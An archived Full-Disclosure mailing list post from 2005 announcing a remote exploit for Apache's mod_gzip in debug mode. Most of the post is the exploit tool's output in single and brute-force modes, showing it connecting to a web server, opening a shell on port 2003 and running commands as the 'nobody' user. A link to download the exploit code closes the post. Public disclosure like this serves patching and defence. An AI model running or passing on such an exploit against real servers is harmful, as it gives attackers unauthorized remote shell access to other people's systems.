Links

Lists

Latest Updates

Ruby On Rails List
Python list
Advanced Java
The JavaScript List
Apache Users
Full Disclosure
Linux Security

Search the archives!
Having a development problem? Ask eDevelopment.org forums!

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] Remote root exploit for mod_gzip (with debug_mode)

  • From: pk95 at yandex.ru (Alexander Antipov)
  • Subject: [Full-Disclosure] Remote root exploit for mod_gzip (with debug_mode)
  • Date: Thu Mar 24 03:30:16 2005
Hi!

/	Single mode:
\
/  	[crz@blacksand crz]$ ./85mod_gzip -t 0 -h localhost
\ 
/  	remote exploit for mod_gzip (debug_mode) [Linux/*BSD]
\                   	by xCrZx [crazy_einstein@xxxxxxxxx] / 
\  	Using: ret_err = 0x42127480, ret = 0xbfffd8f0
/ 
\    	[!] Connecting to localhost:80
/      	[+] Connected!
\      	[*] Trying to connect to localhost:2003 port!!! Pray for success!
/      	[*] Sleeping at 2 seconds...
\ 
/      	[!] Shell is accessible!
\ 
/      	uid=99(nobody) gid=99(nobody) groups=99(nobody)
\      	Linux blacksand 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux
/ 
\	Brute mode:
/ 
\	[crz@blacksand crz]$ ./85mod_gzip -h localhost -b 0xbfffffff -s 1000
/
\	remote exploit for mod_gzip (debug_mode) [Linux/*BSD]
/        	         by xCrZx [crazy_einstein@xxxxxxxxx] /05.06.03/
\
/	Using: ret_err = 0x42127480, ret = 0xbfffffff ,step = 1000
\
/	[~] Brutemode activated!
\	.
/	[!] Shell is accessible!
\
/	uid=99(nobody) gid=99(nobody) groups=99(nobody)
\	Linux blacksand 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux

Code can be download here:

http://www.securitylab.ru/41373.html
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031120/fcfd4b3a/attachment.html